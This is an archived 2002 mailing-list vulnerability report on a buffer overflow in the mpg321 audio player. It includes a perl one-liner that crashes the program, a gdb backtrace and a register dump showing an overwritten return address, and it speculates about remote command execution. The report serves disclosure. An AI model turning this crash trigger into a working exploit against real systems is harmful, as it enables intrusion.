mpg321

From: -l0rt- (simonat_private)
Date: Tue Feb 12 2002 - 15:05:18 PST


    I know that there have been older similar bugs, here is a new one that I
    could find nothing about in the lists.
    
    ---------------------------------------
    os 	: linux
    distro  : RH 7.1 and others
    program : mpg321-0.2.2
    issues  : Possible remote exploitation
    priority: low-medium
    author  : simonat_private
    vendor  : http://mpg321.sourceforge.net/
    ----------------------------------------
    High Performance MPEG 1.0/2.0/2.5 Audio Player for Layer 1, 2, and 3.
    Version 0.59q (2001/Oct/13). Written and copyrights by Joe Drew.
    Uses code from various people. See 'README' for more!
    THIS SOFTWARE COMES WITH ABSOLUTELY NO WARRANTY! USE AT YOUR OWN RISK!
    
    theory:
    
    mpg123 accepts URLs and may be used by other suid binaries or services.
    A buffer condition exists in mpg321 that could allow for
    remote/unwarranted command execution by means of a specially formatted
    URL or other input. mpg321 is not setuid or setgid.
    
    
    fact:
    mpg123 cores when it is passed the following string:
    
    mpg123 `perl -e'print "A" x 10000'`
    
    [simon@nova ~testing]$ mpg321 `perl -e'print "A" x 10000'`
    High Performance MPEG 1.0/2.0/2.5 Audio Player for Layer 1, 2, and 3.
    Version 0.59q (2001/Oct/13). Written and copyrights by Joe Drew.
    Uses code from various people. See 'README' for more!
    THIS SOFTWARE COMES WITH ABSOLUTELY NO WARRANTY! USE AT YOUR OWN RISK!
    Segmentation fault (core dumped)
    [simon@nova ~testing]$
    
    <snip>...
    
    (gdb) bt
    #0  getenv (name=0x40173473 "NGUAGE") at ../sysdeps/generic/getenv.c:87
    #1  0x40070072 in guess_category_value (category=5,
        categoryname=0x414c <Error reading address 0x414c: No such process>)
    at dcigettext.c:1140
    #2  0x4006f08f in __dcigettext (domainname=0x4016e51c "libc",
        msgid1=0x40173b35 "File name too long", msgid2=0x0, plural=0, n=0,
    category=5)
        at dcigettext.c:512
    #3  0x4006ed7d in __dcgettext (domainname=0x4016e51c "libc",
        msgid=0x40173b35 "File name too long", category=5) at dcgettext.c:53
    #4  0x400ccc38 in __strerror_r (errnum=36, buf=0x4017df40 "", buflen=1024)
        at ../sysdeps/generic/_strerror.c:68
    #5  0x400ccbdb in strerror (errnum=36) at strerror.c:30
    #6  0x080497cf in mpg321_error (file=0xbfffd37d 'A' <repeats 200
    times>...) at mpg321.c:66
    #7  0x08049935 in main (argc=1094795585, argv=0x41414141) at mpg321.c:233
    #8  0x41414141 in ?? ()
    Error accessing memory address 0x41414141: No such process.
    (gdb) info registers
    eax            0xbfffd260       -1073753504
    ecx            0x40173471       1075262577
    edx            0x414c   16716
    ebx            0x4017c534       1075299636
    esp            0xbfffaf00       0xbfffaf00
    ebp            0xbfffaf18       0xbfffaf18
    esi            0x4017323d       1075262013
    edi            0x41414141       1094795585
    eip            0x40076a50       0x40076a50
    eflags         0x210206 2163206
    cs             0x23     35
    ss             0x2b     43
    ds             0x2b     43
    es             0x2b     43
    fs             0x2b     43
    gs             0x2b     43
    fctrl          0x0      0
    fstat          0x0      0
    ftag           0x0      0
    fiseg          0x0      0
    fioff          0x0      0
    foseg          0x0      0
    fooff          0x0      0
    fop            0x0      0
    
    
    
    
    -l0rt-
    
    
    ---------------------------------------------------------------------
    Disclaimer: Any resemblance between the above views and those of
    my employer, my terminal, or the view out my window are purely
    coincidental.  Any resemblance between the above and my own views is
    non-deterministic.  The question of the existence of views in the
    absence of anyone to hold them is left as an exercise for the reader.
    The question of the existence of the reader is left as an exercise for
    the second god coefficient.  (A discussion of non-orthogonal,
    non-integral polytheism is beyond the scope of this article.)
    ---------------------------------------------------------------------
    



    This archive was generated by hypermail 2b30 : Tue Feb 12 2002 - 15:18:11 PST